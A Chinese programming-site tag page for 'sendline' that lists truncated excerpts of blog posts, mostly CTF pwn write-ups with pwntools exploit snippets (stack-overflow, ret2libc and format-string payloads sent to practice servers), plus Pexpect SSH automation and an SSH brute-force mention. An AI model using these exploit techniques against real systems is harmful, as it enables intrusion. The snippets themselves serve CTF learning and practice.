E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
sendline
03_when_did_you_born
p.
sendline
("1998")p.recvuntil("Name?")
Zero_0_0
·
2024-02-11 17:59
pwn做题之ret2shellcode
)生成,asm(shellcraft.sh()),用gdb找ebx-eax的值,payload=(ebp-eax)转换成10进制+4(文件为32字节,64字节应为8)+p32(bass区地址).io.
sendline
征的帅
·
2024-01-23 05:51
linux
新手练习02-CGfsb
/cgfsb')#p=remote("111.198.29.45","30991")pwnme=0x804a068p.recvuntil(':')p.
sendline
("n0va")p.recvuntil
n0va
·
2024-01-15 02:17
新手练习03-when_did_you_born
p.
sendline
("
n0va
·
2024-01-05 06:30
Linux系统QT编写简单C++ 的C/S (socket连接)
include#include#include#defineMAXLINE4096intmain(intargc,char**argv){intsockfd,n;charrecvline[4096],
sendline
岑小岑
·
2023-11-09 09:03
Linux
SWPU新生赛2021 Pwn部分WriteUp
’,’<’,’${IFS}’这很web直接绕就行tac$IFS$1flaggift_pwnret2textfrompwnimport*p=remote('1.14.71.254','28057')p.
sendline
是Mumuzi
·
2023-10-29 07:01
NSSCTF
ctf
网络安全
buu [第五空间2019 决赛]PWN5 wp
("node3.buuoj.cn",29172)#%10$n的意思是向偏移为10处所指向的地址处写入已经写的字符数#即mov[%10$n],字符数payload=p32(addr)+"%10$n"p.
sendline
N1ptune__
·
2023-10-23 06:01
pwn
python
sendline
_探索 Pexpect,第 1 部分:剖析 Pexpect
探索Pexpect,第1部分:剖析Pexpect吕学良,丁钦浩,和王乾2009年5月07日发布概述Pexpect是DonLibes的Expect语言的一个Python实现,是一个用来启动子程序,并使用正则表达式对程序输出做出特定响应,以此实现与其自动交互的Python模块。Pexpect的使用范围很广,可以用来实现与ssh、ftp、telnet等程序的自动交互;可以用来自动复制软件安装包并在不同机
weixin_39768917
·
2023-10-10 21:59
python
sendline
python的except函数_Python调用系统函数:pexcept模块
envpython#coding=utf-8importpexpectcmd="sudotouchsudo_touch"passwd='***'run=pexpect.spawn(cmd)try:run.
sendline
mmjang
·
2023-10-10 21:28
python的except函数
pwn入门
1.需要发送一个信息,读入r.recvuntil('[+]Pleaseinputthelengthofyourname:\n')r.
sendline
('-1')
El.十一
·
2023-10-02 05:46
其他
NSSCTF PWN方向刷题记录
/pwnuaf')def_add_note():io.recvuntil(":")io.
sendline
("1")def_edit_note(id,content)
CyhStyrl
·
2023-09-24 07:07
网络安全
对payload以及函数传参的进一步理解
pwnpayload32位程序传参64位程序传参payload模板:payload=“a“*0x88p.
sendline
(payload)在模板里是先编造好payload,再在程序需要输入时用
sendline
RKAnjia
·
2023-08-07 21:56
PWN
新手练习05-level0
/level0')#p=remote("111.198.29.45","31008")call_system=0x400596payload=0x88*'a'+p64(call_system)p.
sendline
n0va
·
2023-06-08 04:02
BUUCTF(pwn)bjdctf_2020_babystack2
0x400726p.sendlineafter("[+]Pleaseinputthelengthofyourname:\n",'-1')p.recv()payload='a'*(0x10+8)+p64(flag)p.
sendline
半岛铁盒@
·
2023-04-20 18:05
pwn题
BJDCTF2020 babystack
frompwnimport*r=remote("pwn.challenge.ctf.show",28117)backdoor=0x4006e6retn=0X4006far.recvuntil("name:\n")r.
sendline
whit233
·
2023-04-20 18:02
ctfshow
pwn详细wp
python
bjdctf2020 babystack
/bjdctf_2020_babystack')p.recvuntil("lengthofyourname:\n")p.
sendline
('1024')p.recvuntil("What'suname?
「已注销」
·
2023-04-20 18:32
pwn
pwnable.kr:lotto-poc
pwnable.kr',user='lotto',password='guest',port=2222)p=s.process('/home/lotto/lotto')while1:data=p.recv()p.
sendline
D0j0kur0
·
2023-04-12 22:38
【pwn学习】buuctf pwn题目(一)
位看一下代码没有任何过滤直接一个rop应该就行了有个fun函数直接就有sh了,就跳过去就好了payloadsystem_addr=0x0401186payload=flat('A'*15,0,system_addr)cn.
sendline
ckj123
·
2023-03-14 13:42
2019广东强网杯_wp
/pwn1')p=remote('119.61.19.212',8087)defsl(x):p.
sendline
(x)de
2mpossible
·
2022-02-18 09:17
[new bugku] pwn
\n')payload='a'*0x30+'bbbbbbbb'+p64(0x400751)p.
sendline
(payload)p.interactive()pwn732位教科书栈溢出,
2mpossible
·
2021-06-12 19:40
python中Pexpect的工作流程实例讲解
1、工作流程步骤(1)用spawn来执行一个程序;(2)用expect方法来等待指定的关键字,这个关键字是被执行的程序打印到标准输出上面的;(3)当发现这个关键字以后,使用send/
sendline
方法发送字符串给这个程序
·
2021-05-25 18:46
Python安全脚本 ---- Linux主机基线查询
能实现与Linux主机交互的方式:frompexpectimportpxsshs=pxssh.pxssh()s.login(host,username,passwd)s.
sendline
(cmd)s.prompt
aojiang1365
·
2020-08-25 17:47
supermarket CISCN-2018-Quals
参考链接https://blog.csdn.net/qq_33528164/article/details/80144580这个题目的漏洞点就是在realloc如果当重新分配的new_size>")io.
sendline
pipixia233333
·
2020-08-25 17:58
栈溢出
堆溢出
攻防世界反应釜开关控制和cgpwn2
expfrompwnimport*p=remote("220.249.52.133",50651)shell=0x4005f6payload='a'*0x208+p64(shell)p.recv()p.
sendline
inryyy
·
2020-08-25 17:40
basic rop ret2libc2
题目地址:ret2libc2看一下ctfwiki的wp,这个题目我也并不是很明白,我只能进行一部分猜测,应该是想让第一个
sendline
执行读取字符串的操作,居然有这种骚操作,属实搞不懂,这种只能先记住
arch li
·
2020-08-24 06:13
ctf-wiki-pwn
ciscn_2019_en_2 ret2libc64
\n')p.
sendline
("1")p.recvuntil('encrypted\n')poprdiret=0x0000000000400c83pltputs=0x00000000004006E0gotputs
pond99
·
2020-08-19 18:51
pwn
python之pexpect模块
python之pexpect模块一:pexpect简介二:基本使用流程三:API使用3.1spawn类3.2expect()方法3.3
sendline
()方法3.4其他发送信息的方法3.5其他获取结果的方法四
琴酒网络
·
2020-08-18 15:47
Linux运维
XCTF PWN高手进阶区之pwn-200
sub_addr=0x8048484defleak(addr):payload=‘a’*112+p32(write_plt)+p32(sub_addr)+p32(1)+p32(addr)+p32(4)p.
sendline
neuisf
·
2020-08-04 15:54
Pwn
【pwn】 0ctf_2017_babyheap
/libc-2.23.so')defadd(size):io.recvuntil('Command:')io.
sendline
('1')io.recvuntil('S
yudhui
·
2020-08-04 14:48
pwn
pwn
2r.
sendline
(data):发送一行数据,相当于在数据末尾加\n。3r.interactive():在取得shell之后使用,直接进行交互,相当于回到
IX2700123456
·
2020-08-04 12:23
homework
p.
sendline
('aaaa')p.recvuntil('>')p.
sendline
('1')p.recvuntil('
2mpossible
·
2020-07-30 07:43
BUU刷题(三)
/fm')p=remote("node3.buuoj.cn","27782")payload=p32(0x0804a02c)+'%11$n'p.
sendline
(payload)p.interactive
playmak3r
·
2020-07-29 23:29
CTF-PWN
Udp数据发送最大长度问题讨论
数据发送最大长度问题讨论1.问题描述在使用udp进行编程时,遇到这样一个问题:利用Udp进行发送视频数据,会出现发送失败的情况,具体现象如下:1.1widows下打印相关的错误输出:funcUdpClient::
Sendline
114sendtoerrerrnois10040
码中飞翔
·
2020-07-12 05:57
LCTF2018 easy_heap&&just_pwn
(0,&a1[v3],1uLL);if(a2-1tcache只能malloc(0xF8)可以先填满对应的tcachebin获得unsortedbin审错了他的read过程,看成了if(a2-1")p.
sendline
Kirin_say
·
2020-07-10 02:08
I/O复用之 select和epoll
9在我们介绍I/O复用之前,先来看一个小例子:...while(fgets(
sendline
,MAXLINE,fp)!
the_scent_of_th_soul
·
2020-07-08 07:21
计算机网络
Pwn level题目
level0pwn一般套路1.找到栈溢出地址(就是搞事情的地址),基本上都是buf的地址,这个地址需要用pwntools中的p32或p64进行转换,(若程序是32位的就用p32)才能pwntools中的
sendline
饭饭啊饭饭
·
2020-07-06 14:24
pwn
攻防世界pwn新手练习区通关教程
\n")r.
sendline
("2000")r.recvuntil("What'sYourName?\n")
安徽锋刃科技
·
2020-06-30 03:28
ctf
攻防世界
【BUUCTF - PWN】warmup_csaw_2016
fromLibcSearcherimport*context.os='linux'context.arch='amd64'context.log_level='debug'sl=lambdax:io.
sendline
古月浪子
·
2020-06-26 20:59
BUUCTF
-
PWN
i春秋上的几道pwn题
context.log_level='debug'defleak(addr):io.sendafter('>','2')io.sendafter('username(maxlenth:20):\n','BBBB')#用
sendline
Sopora
·
2020-06-26 14:28
二进制
SSH暴力破解之Python-pxssh实现
简单示例:importpxsshdefsend_command(s,cmd):s.
sendline
(cmd)s.prompt()prints.b
6um1n
·
2020-06-22 20:30
Python
Pwn
虽然溢出了,但是和溢出没有太大关系所以利用代码如下:frompwnimport*p=remote("139.224.220.67",30004)payload='a'*0x501p.
sendline
(payload
bluestar628
·
2020-06-22 18:49
CTF
BUUCTF PWN部分题目wp
RIP为fun()的地址,用peda计算偏移为23,写脚本frompwnimport*sh=remote('f.buuoj.cn',6001)payload='a'*23+p64(0x401186)sh.
sendline
awxnutpgs545144602
·
2020-06-22 15:09
攻防世界pwn新手区writeup
get_shell#coding=utf-8frompwnimport*context.log_level='debug'io=remote('111.198.29.45',54766)io.
sendline
a370793934
·
2020-06-22 11:47
WriteUp
Python3 用pexpect进行ssh交互(附带python3在linux下安装)
用pexpectimportpexpectPROMPT=['#','>>>','>','\$']defsend_command(child,cmd):child.
sendline
(cmd)child.expect
人间正道是沧桑818
·
2020-06-21 23:41
Python
Python 访问修改全局变量
pythonimportpexpectCOC_START_NUM=0deffoo():globalCOC_START_NUMtry:cmd='amstart-n'+coc_activity#process.
sendline
步履不停的Suunny
·
2020-06-21 22:03
adworld pwn 题解
新手练习CGfsb简单的格式化字符串frompwnimport*p=process("cgfsb")p=remote("111.198.29.45",32128)p.
sendline
("123")p.
sendline
Nevv
·
2020-04-03 00:10
简单循环服务器实现
include#include#defineMAXLINE4096intmain(intargc,char**argv){intsockfd,n,rec_len;charrecvline[4096],
sendline
咸鱼而已
·
2020-02-06 15:35
pwntools使用
0x01连接本地porcess("程序")远程remote("url","port")0x02IO模块send(data)发送数据
sendline
(data)发送一行数据,相当于在数据后面加\nrecv
S_s_s_a53f
·
2020-01-05 09:05
【PWN】Pwntools 使用(持续更新)
0x01连接本地porcess("程序")远程remote("url","port")0x02IO模块send(data)发送数据
sendline
(data)发送一行数据,相当于在数据后面加\nrecv
Pino_HD
·
2019-12-28 16:37
[2018网鼎杯] 总决赛writesup(pwn)
\n>')p.
sendline
(payload)p.interactive()LF
D4rk3r
·
2019-11-06 19:30
上一页
1
2
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他